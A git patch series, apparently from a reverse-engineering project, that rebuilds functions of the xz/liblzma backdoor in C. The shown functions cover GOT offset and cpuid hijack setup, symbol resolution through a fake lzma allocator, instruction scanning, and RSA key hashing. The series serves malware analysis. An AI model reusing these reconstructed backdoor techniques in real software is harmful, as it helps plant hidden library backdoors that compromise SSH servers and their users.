From 6a0619f1319247f0b0709185329476d778faa35b Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 11:14:37 +0200 Subject: [PATCH 01/15] xzre_code: add find_function --- xzre_code/CMakeLists.txt | 1 + xzre_code/find_function.c | 42 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 43 insertions(+) create mode 100644 xzre_code/find_function.c diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index 7392cd5..6efc00a 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -7,6 +7,7 @@ add_library(xzre_code is_endbr64_instruction.c fake_lzma_alloc.c fake_lzma_free.c + find_function.c main_elf_parse.c run_backdoor_commands.c secret_data_append_from_address.c diff --git a/xzre_code/find_function.c b/xzre_code/find_function.c new file mode 100644 index 0000000..843fcb1 --- /dev/null +++ b/xzre_code/find_function.c @@ -0,0 +1,42 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +BOOL find_function( + u8 *code_start, + void **func_start, + void **func_end, + u8 *search_base, + u8 *code_end, + FuncFindType find_mode +){ + u8 *res = NULL; + /** should we locate the function prologue? */ + if(func_start){ + for(u8 *p = code_start; + search_base < p && !find_function_prologue(p, code_end, &res, find_mode); + --p); + + if(!res || res == search_base && !find_function_prologue(search_base, code_end, NULL, find_mode)){ + return FALSE; + } + *func_start = res; + } + /** should we locate the function epilogue? */ + if(func_end){ + u8 *search_from = code_start + 1; + u8 *search_to = code_end - 4; + BOOL found; + for(;search_from < search_to && + (found=find_function_prologue(search_from, code_end, NULL, find_mode)) == FALSE; + ++search_from + ); + // FIXME: in theory the first check is redundant, as it's covered by the second one + if(found || search_to != search_from || find_function_prologue(search_from, code_end, NULL, find_mode)){ + code_end = search_from; + } + *func_end = code_end; + } + return TRUE; +} \ No newline at end of file From eab7ebb98bd91e84494a00c68be30b0bef1efa25 Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 11:19:56 +0200 Subject: [PATCH 02/15] xzre_code: add count_pointers --- xzre_code/CMakeLists.txt | 1 + xzre_code/count_pointers.c | 22 ++++++++++++++++++++++ 2 files changed, 23 insertions(+) create mode 100644 xzre_code/count_pointers.c diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index 6efc00a..cdf97e3 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -1,6 +1,7 @@ add_library(xzre_code backdoor_entry.c chacha_decrypt.c + count_pointers.c elf_parse.c elf_symbol_get_addr.c get_lzma_allocator.c diff --git a/xzre_code/count_pointers.c b/xzre_code/count_pointers.c new file mode 100644 index 0000000..080b267 --- /dev/null +++ b/xzre_code/count_pointers.c @@ -0,0 +1,22 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +BOOL count_pointers( + void **ptrs, + u64 *count_out, + libc_imports_t *funcs +){ + if(!ptrs) return FALSE; + if(!funcs) return FALSE; + if(!funcs->malloc_usable_size) return FALSE; + size_t blockSize = funcs->malloc_usable_size(ptrs); + if(blockSize - 8 > 127) return FALSE; + size_t nWords = blockSize >> 3; + + size_t i; + for(i=0; i < nWords && ptrs[i]; ++i); + *count_out = i; + return TRUE; +} \ No newline at end of file From f4e6005187f5433b46892c53a5a890db67f66841 Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 11:28:36 +0200 Subject: [PATCH 03/15] xzre_code: add rsa_key_hash --- xzre_code/CMakeLists.txt | 1 + xzre_code/rsa_key_hash.c | 28 ++++++++++++++++++++++++++++ 2 files changed, 29 insertions(+) create mode 100644 xzre_code/rsa_key_hash.c diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index cdf97e3..dbe8437 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -10,6 +10,7 @@ add_library(xzre_code fake_lzma_free.c find_function.c main_elf_parse.c + rsa_key_hash.c run_backdoor_commands.c secret_data_append_from_address.c secret_data_append_item.c diff --git a/xzre_code/rsa_key_hash.c b/xzre_code/rsa_key_hash.c new file mode 100644 index 0000000..781fec9 --- /dev/null +++ b/xzre_code/rsa_key_hash.c @@ -0,0 +1,28 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +BOOL rsa_key_hash( + const RSA *rsa, + u8 *mdBuf, + u64 mdBufSize, + imported_funcs_t *funcs +){ + u8 buf[0x100A] = {0}; + u64 written = 0, expSize = 0; + const BIGNUM *n = NULL, *e = NULL; + BOOL result = (TRUE + && funcs && rsa && funcs->RSA_get0_key + && (funcs->RSA_get0_key(rsa, &n, &e, NULL), e != NULL && n != NULL) + // get bytes of 'e' + && bignum_serialize(buf, sizeof(buf), &written, e, funcs) + && (expSize = written, written <= 0x1009) + // get bytes of 'n' + && bignum_serialize(buf + written, sizeof(buf) - written, &written, n, funcs) + && written + expSize <= sizeof(buf) + // hash e+n + && sha256(buf, written + expSize, mdBuf, mdBufSize, funcs) + ); + return result; +} \ No newline at end of file From 504a052a38d47cae11b9cff46a0564fc46cda8cb Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 11:35:43 +0200 Subject: [PATCH 04/15] xzre_code: add count_bits --- xzre_code/CMakeLists.txt | 1 + xzre_code/count_bits.c | 10 ++++++++++ 2 files changed, 11 insertions(+) create mode 100644 xzre_code/count_bits.c diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index dbe8437..561efad 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -1,6 +1,7 @@ add_library(xzre_code backdoor_entry.c chacha_decrypt.c + count_bits.c count_pointers.c elf_parse.c elf_symbol_get_addr.c diff --git a/xzre_code/count_bits.c b/xzre_code/count_bits.c new file mode 100644 index 0000000..7a45717 --- /dev/null +++ b/xzre_code/count_bits.c @@ -0,0 +1,10 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +u32 count_bits(u64 x){ + u32 result; + for(result=0; x; ++result, x &= x-1); + return result; +} From 1df38c7f7f9210f9453c55439867585167015bc2 Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 11:39:12 +0200 Subject: [PATCH 05/15] xzre_code: add init_elf_entry_ctx --- xzre_code/CMakeLists.txt | 1 + xzre_code/init_elf_entry_ctx.c | 12 ++++++++++++ 2 files changed, 13 insertions(+) create mode 100644 xzre_code/init_elf_entry_ctx.c diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index 561efad..09cbb24 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -7,6 +7,7 @@ add_library(xzre_code elf_symbol_get_addr.c get_lzma_allocator.c is_endbr64_instruction.c + init_elf_entry_ctx.c fake_lzma_alloc.c fake_lzma_free.c find_function.c diff --git a/xzre_code/init_elf_entry_ctx.c b/xzre_code/init_elf_entry_ctx.c new file mode 100644 index 0000000..98cdb7f --- /dev/null +++ b/xzre_code/init_elf_entry_ctx.c @@ -0,0 +1,12 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +void init_elf_entry_ctx(elf_entry_ctx_t *ctx){ + ctx->symbol_ptr = (void *)&cpuid_random_symbol; + ctx->got_ctx.return_address = (void *)ctx->frame_address[3]; + get_got_offset(ctx); + get_cpuid_got_index(ctx); + ctx->got_ctx.got_ptr = NULL; +} From bef711df8a42650f8fdf4f99a54364916cb83a06 Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 11:50:13 +0200 Subject: [PATCH 06/15] xzre_code: add update_got_offset --- xzre.h | 17 ++++++++--------- xzre.lds.in | 2 +- xzre_code/CMakeLists.txt | 1 + xzre_code/init_elf_entry_ctx.c | 2 +- xzre_code/update_got_offset.c | 8 ++++++++ 5 files changed, 19 insertions(+), 11 deletions(-) create mode 100644 xzre_code/update_got_offset.c diff --git a/xzre.h b/xzre.h index 3634122..7e231d8 100644 --- a/xzre.h +++ b/xzre.h @@ -2859,24 +2859,23 @@ extern void * backdoor_init(elf_entry_ctx_t *state, u64 *caller_frame); * * stores the address of the symbol cpuid_random_symbol in elf_entry_ctx_t::symbol_ptr * stores the return address of the function that called the IFUNC resolver which is a stack address in ld.so - * calls get_got_offset() to update elf_entry_ctx_t::got_offset - * calls get_cpuid_got_index() to update elf_entry_ctx_t::cpuid_fn + * calls update_got_offset() to update elf_entry_ctx_t::got_offset + * calls get_cpuid_got_index() to update @ref elf_entry_ctx_t.got_ctx.cpuid_fn * * @param ctx */ extern void init_elf_entry_ctx(elf_entry_ctx_t *ctx); /** - * @brief get the offset to the GOT + * @brief updates the offset to the GOT * - * the offset is relative to the address of the symbol cpuid_random_symbol - * - * stores the offset in elf_entry_ctx_t::got_offset + * the offset is the distance to the GOT relative to the address of the symbol cpuid_random_symbol + * this value is stored in @ref elf_entry_ctx_t.got_ctx.got_offset * * @param ctx - * @return ptrdiff_t offset to GOT from the symbol cpuid_random_symbol + * @return ptrdiff_t */ -extern ptrdiff_t get_got_offset(elf_entry_ctx_t *ctx); +extern void update_got_offset(elf_entry_ctx_t *ctx); /** * @brief get the cpuid() GOT index @@ -3940,7 +3939,7 @@ static_assert(sizeof(tls_get_addr_random_symbol) == 0x8); * * liblzma_la-crc64-fast.o lists the fields in the relocation table so that the linker fills out the fields with the offsets * - * used by call_backdoor_init_stage2(), get_got_offset() and get_cpuid_got_index() + * used by call_backdoor_init_stage2(), update_got_offset() and get_cpuid_got_index() * */ extern const backdoor_cpuid_reloc_consts_t cpuid_reloc_consts; diff --git a/xzre.lds.in b/xzre.lds.in index d0058ab..a309d5e 100644 --- a/xzre.lds.in +++ b/xzre.lds.in @@ -91,7 +91,7 @@ SECTIONS_BEGIN() /* 0000000000003F50 */ DEFSYM(get_cpuid_got_index, .text.lzma_stream_decoder_inia) /* 0000000000003F70 */ DEFSYM(get_tls_get_addr_random_symbol_got_offset, .text.lzma_stream_flags_compara) /* 0000000000003F90 */ DEFSYM(update_got_address, .text.lzma_stream_header_encoda) - /* 0000000000004000 */ DEFSYM(get_got_offset, .text.parse_delt1) + /* 0000000000004000 */ DEFSYM(update_got_offset, .text.parse_delt1) /* 0000000000004020 */ DEFSYM(init_elf_entry_ctx, .text.read_output_and_waia) /* 0000000000004050 */ DEFSYM(get_lzma_allocator, .text.stream_decoder_memconfia) /* 0000000000004070 */ DEFSYM(find_link_map_l_name, .text.lzma_delta_props_encoda) diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index 09cbb24..343a279 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -20,6 +20,7 @@ add_library(xzre_code secret_data_get_decrypted.c sha256.c sshd_patch_variables.c + update_got_offset.c ) target_compile_options(xzre_code PRIVATE -Os -fomit-frame-pointer diff --git a/xzre_code/init_elf_entry_ctx.c b/xzre_code/init_elf_entry_ctx.c index 98cdb7f..bd01121 100644 --- a/xzre_code/init_elf_entry_ctx.c +++ b/xzre_code/init_elf_entry_ctx.c @@ -6,7 +6,7 @@ void init_elf_entry_ctx(elf_entry_ctx_t *ctx){ ctx->symbol_ptr = (void *)&cpuid_random_symbol; ctx->got_ctx.return_address = (void *)ctx->frame_address[3]; - get_got_offset(ctx); + update_got_offset(ctx); get_cpuid_got_index(ctx); ctx->got_ctx.got_ptr = NULL; } diff --git a/xzre_code/update_got_offset.c b/xzre_code/update_got_offset.c new file mode 100644 index 0000000..66358ed --- /dev/null +++ b/xzre_code/update_got_offset.c @@ -0,0 +1,8 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +void update_got_offset(elf_entry_ctx_t *ctx){ + ctx->got_ctx.got_offset = cpuid_reloc_consts.cpuid_random_symbol_got_offset; +} From c02550889dae081c05e23e0d2a9c1a1a01b17a09 Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 11:54:46 +0200 Subject: [PATCH 07/15] xzre_code: add update_cpuid_got_index --- xzre.h | 4 ++-- xzre.lds.in | 2 +- xzre_code/CMakeLists.txt | 1 + xzre_code/init_elf_entry_ctx.c | 2 +- xzre_code/update_cpuid_got_index.c | 8 ++++++++ 5 files changed, 13 insertions(+), 4 deletions(-) create mode 100644 xzre_code/update_cpuid_got_index.c diff --git a/xzre.h b/xzre.h index 7e231d8..47e7b0a 100644 --- a/xzre.h +++ b/xzre.h @@ -2860,7 +2860,7 @@ extern void * backdoor_init(elf_entry_ctx_t *state, u64 *caller_frame); * stores the address of the symbol cpuid_random_symbol in elf_entry_ctx_t::symbol_ptr * stores the return address of the function that called the IFUNC resolver which is a stack address in ld.so * calls update_got_offset() to update elf_entry_ctx_t::got_offset - * calls get_cpuid_got_index() to update @ref elf_entry_ctx_t.got_ctx.cpuid_fn + * calls update_cpuid_got_index() to update @ref elf_entry_ctx_t.got_ctx.cpuid_fn * * @param ctx */ @@ -2885,7 +2885,7 @@ extern void update_got_offset(elf_entry_ctx_t *ctx); * @param ctx * @return u64 cpuid() GOT index */ -extern u64 get_cpuid_got_index(elf_entry_ctx_t *ctx); +extern void update_cpuid_got_index(elf_entry_ctx_t *ctx); /** * @brief diff --git a/xzre.lds.in b/xzre.lds.in index a309d5e..daa1b36 100644 --- a/xzre.lds.in +++ b/xzre.lds.in @@ -88,7 +88,7 @@ SECTIONS_BEGIN() /* 0000000000003CD0 */ DEFSYM(main_elf_parse, .text.lzma_filter_decoder_is_supportea) /* 0000000000003D40 */ DEFSYM(sshd_get_sensitive_data_score, .text.lzma_lzma2_encoder_memusaga) /* 0000000000003DA0 */ DEFSYM(sshd_find_monitor_struct, .text.lzma_mf_bt4_fina) - /* 0000000000003F50 */ DEFSYM(get_cpuid_got_index, .text.lzma_stream_decoder_inia) + /* 0000000000003F50 */ DEFSYM(update_cpuid_got_index, .text.lzma_stream_decoder_inia) /* 0000000000003F70 */ DEFSYM(get_tls_get_addr_random_symbol_got_offset, .text.lzma_stream_flags_compara) /* 0000000000003F90 */ DEFSYM(update_got_address, .text.lzma_stream_header_encoda) /* 0000000000004000 */ DEFSYM(update_got_offset, .text.parse_delt1) diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index 343a279..9e3ff7d 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -21,6 +21,7 @@ add_library(xzre_code sha256.c sshd_patch_variables.c update_got_offset.c + update_cpuid_got_index.c ) target_compile_options(xzre_code PRIVATE -Os -fomit-frame-pointer diff --git a/xzre_code/init_elf_entry_ctx.c b/xzre_code/init_elf_entry_ctx.c index bd01121..f2398f7 100644 --- a/xzre_code/init_elf_entry_ctx.c +++ b/xzre_code/init_elf_entry_ctx.c @@ -7,6 +7,6 @@ void init_elf_entry_ctx(elf_entry_ctx_t *ctx){ ctx->symbol_ptr = (void *)&cpuid_random_symbol; ctx->got_ctx.return_address = (void *)ctx->frame_address[3]; update_got_offset(ctx); - get_cpuid_got_index(ctx); + update_cpuid_got_index(ctx); ctx->got_ctx.got_ptr = NULL; } diff --git a/xzre_code/update_cpuid_got_index.c b/xzre_code/update_cpuid_got_index.c new file mode 100644 index 0000000..bedcf52 --- /dev/null +++ b/xzre_code/update_cpuid_got_index.c @@ -0,0 +1,8 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +void update_cpuid_got_index(elf_entry_ctx_t *ctx){ + ctx->got_ctx.cpuid_fn = (void *)cpuid_reloc_consts.cpuid_got_index; +} From 43e7fc948ee0f241f9926df943bc9a81cb94fc3f Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 11:58:05 +0200 Subject: [PATCH 08/15] xzre_code: add find_string_reference --- xzre_code/CMakeLists.txt | 1 + xzre_code/find_string_reference.c | 16 ++++++++++++++++ 2 files changed, 17 insertions(+) create mode 100644 xzre_code/find_string_reference.c diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index 9e3ff7d..5dc3905 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -6,6 +6,7 @@ add_library(xzre_code elf_parse.c elf_symbol_get_addr.c get_lzma_allocator.c + find_string_reference.c is_endbr64_instruction.c init_elf_entry_ctx.c fake_lzma_alloc.c diff --git a/xzre_code/find_string_reference.c b/xzre_code/find_string_reference.c new file mode 100644 index 0000000..76e2385 --- /dev/null +++ b/xzre_code/find_string_reference.c @@ -0,0 +1,16 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +u8 *find_string_reference( + u8 *code_start, + u8 *code_end, + const char *str +){ + dasm_ctx_t dctx = {0}; + if(find_lea_instruction_with_mem_operand(code_start, code_end, &dctx, (void *)str)){ + return dctx.instruction; + } + return NULL; +} From c05fdcfb51593948c50f3a0a967fb0a56c2b6334 Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 17:01:36 +0200 Subject: [PATCH 09/15] xzre_code: add find_lea_instruction --- xzre.h | 56 ++++++++++++++++++-------------- xzre_code/CMakeLists.txt | 1 + xzre_code/find_lea_instruction.c | 25 ++++++++++++++ 3 files changed, 58 insertions(+), 24 deletions(-) create mode 100644 xzre_code/find_lea_instruction.c diff --git a/xzre.h b/xzre.h index 47e7b0a..3b1e074 100644 --- a/xzre.h +++ b/xzre.h @@ -301,6 +301,10 @@ typedef struct { // opcode is always +0x80 for the sake of it (yet another obfuscation) #define XZDASM_OPC(op) (op - 0x80) +enum X86_OPCODE { + X86_OPCODE_LEA = 0x8D +}; + typedef int BOOL; #define TRUE 1 @@ -308,34 +312,38 @@ typedef int BOOL; typedef enum { // has lock or rep prefix - DF_LOCK_REP = 1, - // has segment override - DF_SEG = 2, - // has operand size override - DF_OSIZE = 4, - // has address size override - DF_ASIZE = 8, - // vex instruction - DF_VEX = 0x10, - // has rex - DF_REX = 0x20, - // has modrm - DF_MODRM = 0x40, - // has sib - DF_SIB = 0x80 + DF1_LOCK_REP = 1, + //1 has segment override + DF1_SEG = 2, + //1 has operand size override + DF1_OSIZE = 4, + //1 has address size override + DF1_ASIZE = 8, + //1 vex instruction + DF1_VEX = 0x10, + //1 has rex + DF1_REX = 0x20, + //1 has modrm + DF1_MODRM = 0x40, + //1 has sib + DF1_SIB = 0x80 } InstructionFlags; typedef enum { // memory with displacement - DF_MEM_DISP = 0x1, - // 8-bit displacement - DF_MEM_DISP8 = 0x2, - // memory seg+offs (0xa0-0xa3) - DF_MEM_SEG_OFFS = 0x4, - // has immediate - DF_IMM = 0x8, - // 64-bit immediate (movabs) - DF_IMM64 = 0x10 + DF2_MEM_DISP = 0x1, + //2 8-bit displacement + DF2_MEM_DISP8 = 0x2, + //2 memory seg+offs (0xa0-0xa3) + DF2_MEM_SEG_OFFS = 0x4, + + // mask to check for memory flags + DF2_FLAGS_MEM = DF2_MEM_DISP | DF2_MEM_DISP8 | DF2_MEM_SEG_OFFS, + + //2 has immediate + DF2_IMM = 0x8, + //2 64-bit immediate (movabs) + DF2_IMM64 = 0x10 } InstructionFlags2; typedef enum { diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index 5dc3905..470f040 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -6,6 +6,7 @@ add_library(xzre_code elf_parse.c elf_symbol_get_addr.c get_lzma_allocator.c + find_lea_instruction.c find_string_reference.c is_endbr64_instruction.c init_elf_entry_ctx.c diff --git a/xzre_code/find_lea_instruction.c b/xzre_code/find_lea_instruction.c new file mode 100644 index 0000000..1f98af2 --- /dev/null +++ b/xzre_code/find_lea_instruction.c @@ -0,0 +1,25 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +BOOL find_lea_instruction(u8 *code_start, u8 *code_end, u64 displacement){ + + if(!secret_data_append_from_call_site( + (secret_data_shift_cursor_t){ 0x7C }, + 5, 6, 0) + ){ + return FALSE; + } + dasm_ctx_t dctx = {0}; + for(;code_start < code_end; ++code_start){ + if(x86_dasm(&dctx, code_start, code_end) + && XZDASM_OPC(dctx.opcode) == X86_OPCODE_LEA + && (dctx.flags2 & DF2_FLAGS_MEM) == DF2_MEM_DISP + && (dctx.mem_disp == displacement || dctx.mem_disp == -displacement) + ){ + return TRUE; + } + } + return FALSE; +} \ No newline at end of file From f57aa3da2f1fff4a2dbfcc48745d2d2cc2098b0e Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 17:12:27 +0200 Subject: [PATCH 10/15] xzre_code: add resolve_libc_imports --- xzre.h | 9 +++++++++ xzre_code/CMakeLists.txt | 1 + xzre_code/resolve_libc_imports.c | 25 +++++++++++++++++++++++++ 3 files changed, 35 insertions(+) create mode 100644 xzre_code/resolve_libc_imports.c diff --git a/xzre.h b/xzre.h index 3b1e074..87bc4c6 100644 --- a/xzre.h +++ b/xzre.h @@ -3894,6 +3894,15 @@ static_assert(sizeof(fake_lzma_allocator_offset) == 0x8); extern fake_lzma_allocator_t fake_lzma_allocator; static_assert(sizeof(fake_lzma_allocator) == 0x20); +/** + * @brief lzma_alloc function, used by the backdoor as an ELF symbol resolver + * the @p allocator 's opaque field must point to a parsed @ref elf_info_t + * + * @param size the encoded string ID of the function to resolve + * @param allocator the fake lzma allocator referring to the @ref elf_info_t to search into. + */ +extern void *lzma_alloc(size_t size, lzma_allocator *allocator); + /** * @brief special .data.rel.ro section that contains the offset to elf_functions * diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index 470f040..d181105 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -14,6 +14,7 @@ add_library(xzre_code fake_lzma_free.c find_function.c main_elf_parse.c + resolve_libc_imports.c rsa_key_hash.c run_backdoor_commands.c secret_data_append_from_address.c diff --git a/xzre_code/resolve_libc_imports.c b/xzre_code/resolve_libc_imports.c new file mode 100644 index 0000000..5dda646 --- /dev/null +++ b/xzre_code/resolve_libc_imports.c @@ -0,0 +1,25 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" +#include + +BOOL resolve_libc_imports( + struct link_map *libc, + elf_info_t *libc_info, + libc_imports_t *imports +){ + lzma_allocator *resolver = get_lzma_allocator(); + if(!elf_parse((Elf64_Ehdr *)libc->l_addr, libc_info)){ + return FALSE; + } + resolver->opaque = libc_info; + imports->read = lzma_alloc(STR_read, resolver); + if(imports->read) + ++imports->resolved_imports_count; + imports->__errno_location = lzma_alloc(STR_errno_location, resolver); + if(imports->__errno_location) + ++imports->resolved_imports_count; + + return imports->resolved_imports_count == 2; +} From 5a735d20bb28ee4e55ffcdf7d15ca6b94a83e7b3 Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 17:21:37 +0200 Subject: [PATCH 11/15] xzre_code: add find_call_instruction --- xzre.h | 3 ++- xzre_code/CMakeLists.txt | 1 + xzre_code/find_call_instruction.c | 29 +++++++++++++++++++++++++++++ 3 files changed, 32 insertions(+), 1 deletion(-) create mode 100644 xzre_code/find_call_instruction.c diff --git a/xzre.h b/xzre.h index 87bc4c6..6723c0a 100644 --- a/xzre.h +++ b/xzre.h @@ -302,7 +302,8 @@ typedef struct { #define XZDASM_OPC(op) (op - 0x80) enum X86_OPCODE { - X86_OPCODE_LEA = 0x8D + X86_OPCODE_LEA = 0x8D, + X86_OPCODE_CALL = 0xE8 }; typedef int BOOL; diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt index d181105..8c72c21 100644 --- a/xzre_code/CMakeLists.txt +++ b/xzre_code/CMakeLists.txt @@ -6,6 +6,7 @@ add_library(xzre_code elf_parse.c elf_symbol_get_addr.c get_lzma_allocator.c + find_call_instruction.c find_lea_instruction.c find_string_reference.c is_endbr64_instruction.c diff --git a/xzre_code/find_call_instruction.c b/xzre_code/find_call_instruction.c new file mode 100644 index 0000000..c033789 --- /dev/null +++ b/xzre_code/find_call_instruction.c @@ -0,0 +1,29 @@ +/** + * Copyright (C) 2024 Stefano Moioli + **/ +#include "xzre.h" + +BOOL find_call_instruction(u8 *code_start, u8 *code_end, u8 *call_target, dasm_ctx_t *dctx){ + if(!secret_data_append_from_address(NULL, (secret_data_shift_cursor_t){ 0x81 }, 4, 7)){ + return FALSE; + } + dasm_ctx_t ctx = {0}; + if(!dctx){ + dctx = &ctx; + } + + while(code_start < code_end){ + if(x86_dasm(dctx, code_start, code_end)){ + if(XZDASM_OPC(dctx->opcode) == X86_OPCODE_CALL + && (!call_target || &dctx->instruction[dctx->operand + dctx->instruction_size] == call_target) + ){ + return TRUE; + } + code_start += dctx->instruction_size; + } else { + code_start += 1; + } + } + return FALSE; +} + From 20434a1835a060639e463d614c92f47e53e28ad5 Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 19:24:41 +0200 Subject: [PATCH 12/15] add Mod/RM and REX helper macros --- xzre.S | 1 + xzre.c | 7 ++++-- xzre.h | 69 +++++++++++++++++++++++++++++++++++++++++++++++++++++----- 3 files changed, 69 insertions(+), 8 deletions(-) diff --git a/xzre.S b/xzre.S index b50307c..5d7b84f 100644 --- a/xzre.S +++ b/xzre.S @@ -50,6 +50,7 @@ secret_data_append_trampoline: ret dasm_sample: + mov rbp, 0xDEADDEAD endbr64 add QWORD PTR [rdi], 0x0f push r15 diff --git a/xzre.c b/xzre.c index aec66e4..364a22a 100644 --- a/xzre.c +++ b/xzre.c @@ -348,13 +348,16 @@ int main(int argc, char *argv[]){ //hexdump(&ctx, sizeof(ctx)); printf( "[%2d]: opcode: 0x%08"PRIx32" (orig:0x%08"PRIX32") (l: %2"PRIu64") -- " - "modrm: 0x%02"PRIx8" (%"PRId8", %"PRId8", %"PRId8"), operand: %"PRIx64", mem_disp: %"PRIx64", rex.br: %d, f: %02"PRIx8"\n", + "modrm: 0x%02"PRIx8" (mod:%"PRId8", reg:%"PRId8", rm:%"PRId8") -> 0x%08"PRIx32", operand: %"PRIx64", mem_disp: %"PRIx64", rex: 0x%"PRIX8", rex.br: %d, f: %02"PRIx8"\n", i, XZDASM_OPC(ctx.opcode), ctx.opcode, ctx.instruction_size, - ctx.modrm, ctx.modrm_mod, ctx.modrm_reg, ctx.modrm_rm, + ctx.modrm, + ctx.modrm_mod, ctx.modrm_reg, ctx.modrm_rm, + ctx.modrm_word, ctx.operand, ctx.mem_disp, + ctx.rex_byte, // 1: has rex.br, 0 otherwise (ctx.rex_byte & 5) != 0, ctx.flags); diff --git a/xzre.h b/xzre.h index 6723c0a..5ceaf41 100644 --- a/xzre.h +++ b/xzre.h @@ -303,7 +303,16 @@ typedef struct { enum X86_OPCODE { X86_OPCODE_LEA = 0x8D, - X86_OPCODE_CALL = 0xE8 + X86_OPCODE_CALL = 0xE8, + // MOV r16/32/64 r/m16/32/64 + X86_OPCODE_MOV_LOAD = 0x8B, + // MOV m16 Sreg Move + // MOV r16/32/64 Sreg + X86_OPCODE_MOV_STORE = 0x8C +}; + +enum X86_REG { + X86_REG_RBP = 5 }; typedef int BOOL; @@ -666,6 +675,44 @@ assert_offset(elf_entry_ctx_t, symbol_ptr, 0); assert_offset(elf_entry_ctx_t, got_ctx, 0x8); assert_offset(elf_entry_ctx_t, frame_address, 0x28); +/** + * creates the MOD.RM byte, given its components + */ +#define X86_MODRM_BYTE(mod, reg, rm) \ + ((u8)(0 \ + | (u8)(((mod) & 3) << 6) \ + | (u8)(((reg) & 7) << 3) \ + | (u8)(((rm) & 7)) \ + )) + +#define X86_REX_BYTE(w,r,x,b) \ + ((u8)(0x40 \ + | (u8)(((w) & 1) << 3) \ + | (u8)(((r) & 1) << 2) \ + | (u8)(((x) & 1) << 1) \ + | (u8)(((b) & 1) << 0) \ + )) + +#define X86_REX_W X86_REX_BYTE(1,0,0,0) + +/** + * creates the backdoor's MOD.RM word (MOD.RM and its individual components) + */ +#define XZDASM_MODRM_MAKE(mod, reg, rm) \ + ((u32)(0 \ + | (u32)(((rm) & 0xFF)<< 24) \ + | (u32)(((reg) & 0xFF) << 16) \ + | (u32)(((mod) & 0xFF) << 8) \ + | X86_MODRM_BYTE(mod, reg, rm) \ + )) + +enum dasm_modrm_mask { + XZ_MODRM_RM = 0xFF000000, + XZ_MODRM_REG = 0x00FF0000, + XZ_MODRM_MOD = 0x0000FF00, + XZ_MODRM_RAW = 0x000000FF +}; + typedef struct __attribute__((packed)) dasm_ctx { u8* instruction; u64 instruction_size; @@ -687,13 +734,23 @@ typedef struct __attribute__((packed)) dasm_ctx { u8 vex_byte; u8 vex_byte2; u8 vex_byte3; - u8 rex_byte; union { struct __attribute__((packed)) { - u8 modrm; - u8 modrm_mod; - u8 modrm_reg; - u8 modrm_rm; + u8 B : 1; + u8 X : 1; + u8 R : 1; + u8 W : 1; + u8 BitPattern : 4; // always 0100b + }; + u8 rex_byte; + }; + union { + // in little endian order + struct __attribute__((packed)) { + /* 3 */ u8 modrm; + /* 2 */ u8 modrm_mod; + /* 1 */ u8 modrm_reg; + /* 0 */ u8 modrm_rm; }; u32 modrm_word; }; From d33585319faf2655a6e017e7f9e27f4e73f06b5d Mon Sep 17 00:00:00 2001 From: Stefano Moioli Date: Sat, 3 Aug 2024 23:31:38 +0200 Subject: [PATCH 13/15] xzre: add opcode mask printing --- CMakeLists.txt | 1 + x86_opcode_names.c | 268 +++++++++++++++++++++++++++++++++++++++++++++ xzre.c | 27 +++++ xzre.h | 4 +- 4 files changed, 299 insertions(+), 1 deletion(-) create mode 100644 